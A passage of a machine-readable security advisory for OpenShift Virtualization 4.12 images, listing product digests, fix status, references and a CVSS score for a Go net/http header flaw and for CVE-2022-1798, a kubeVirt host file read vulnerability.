"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/http: improper sanitization of Transfer-Encoding header", }, { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: 